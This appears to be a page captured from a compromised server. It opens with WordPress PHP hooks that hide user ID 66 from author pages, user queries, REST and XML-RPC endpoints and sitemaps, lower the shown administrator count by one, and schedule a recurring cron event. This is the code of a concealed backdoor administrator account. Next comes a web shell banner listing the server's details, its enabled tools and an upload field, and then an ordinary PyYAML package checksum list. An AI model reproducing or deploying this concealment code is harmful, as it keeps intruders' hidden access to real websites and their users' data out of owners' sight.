add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
c72246579c4437c07cebb86fbcbc6d90 usr/lib/python3/dist-packages/PyYAML-6.0.1.dist-info/INSTALLER f4c79869c6b2c4dbba35d5fd6d3a7050 usr/lib/python3/dist-packages/PyYAML-6.0.1.dist-info/METADATA 890ecbb6631e0d6068978d5cf303c1d2 usr/lib/python3/dist-packages/PyYAML-6.0.1.dist-info/WHEEL 0f52777150a67dfcd9c7b0fae02a7041 usr/lib/python3/dist-packages/PyYAML-6.0.1.dist-info/top_level.txt 4d2710b3db8d4ea3fd88ec6bc0129627 usr/lib/python3/dist-packages/_yaml/__init__.py 5c6ff14e82035ef43dd45199fac82e76 usr/lib/python3/dist-packages/yaml/__init__.py 45104a718fa86b247c393c2ce6ba7443 usr/lib/python3/dist-packages/yaml/_yaml.cpython-312-aarch64-linux-gnu.so c6e483eed9e1974ef2f01c8a7260276f usr/lib/python3/dist-packages/yaml/composer.py 3722e375c216e7b1703de5973f6f0ad6 usr/lib/python3/dist-packages/yaml/constructor.py 601ef9aed47d0db72c34206680e2e344 usr/lib/python3/dist-packages/yaml/cyaml.py e0f0ca9c666a9a01791edbd817348a3f usr/lib/python3/dist-packages/yaml/dumper.py 38e45073c42b4d3a89d25757577a9f5d usr/lib/python3/dist-packages/yaml/emitter.py f2e05076835b7979ea3306bc49e9d70a usr/lib/python3/dist-packages/yaml/error.py 040482aa0aa48c6f93a860a3bdba15f6 usr/lib/python3/dist-packages/yaml/events.py 11df43922cff707581230e7696e4a057 usr/lib/python3/dist-packages/yaml/loader.py f6e521b283d7539fb2bd48cb5ade5365 usr/lib/python3/dist-packages/yaml/nodes.py 76162f1345a16482938965d80a699e45 usr/lib/python3/dist-packages/yaml/parser.py ad6598cbeb6f768738d992fd6a27f1a4 usr/lib/python3/dist-packages/yaml/reader.py 37c9d5574052eb49f499fe2aba76c0df usr/lib/python3/dist-packages/yaml/representer.py 5d424730938bfb35c7d6a7be6edc7f2b usr/lib/python3/dist-packages/yaml/resolver.py 429dc0706c6f3606643a8ab749fd6f8b usr/lib/python3/dist-packages/yaml/scanner.py ac5b86cbaa857699312176cba7490cc2 usr/lib/python3/dist-packages/yaml/serializer.py 33423c7f46708cc3884a32b8ed937ac6 usr/lib/python3/dist-packages/yaml/tokens.py e6634f686cfa160e232ee5330ef3be77 usr/share/doc/python3-yaml/README.md a472c51bbf4c693a4ab88778b1d79c53 usr/share/doc/python3-yaml/changelog.Debian.gz c7be655192447a8b93f4e289e2059d21 usr/share/doc/python3-yaml/copyright 6f50c1ebf2c976040580b4ef836f25fd usr/share/doc/python3-yaml/examples/pygments-lexer/example.yaml 18f63a9f6a899cb3c6498bd95a5b0815 usr/share/doc/python3-yaml/examples/pygments-lexer/yaml.py 3c4af2f47abdf6b329f582f345394162 usr/share/doc/python3-yaml/examples/yaml-highlight/yaml_hl.cfg 1f8afdc2ea4dc470113eeb90078b4828 usr/share/doc/python3-yaml/examples/yaml-highlight/yaml_hl.py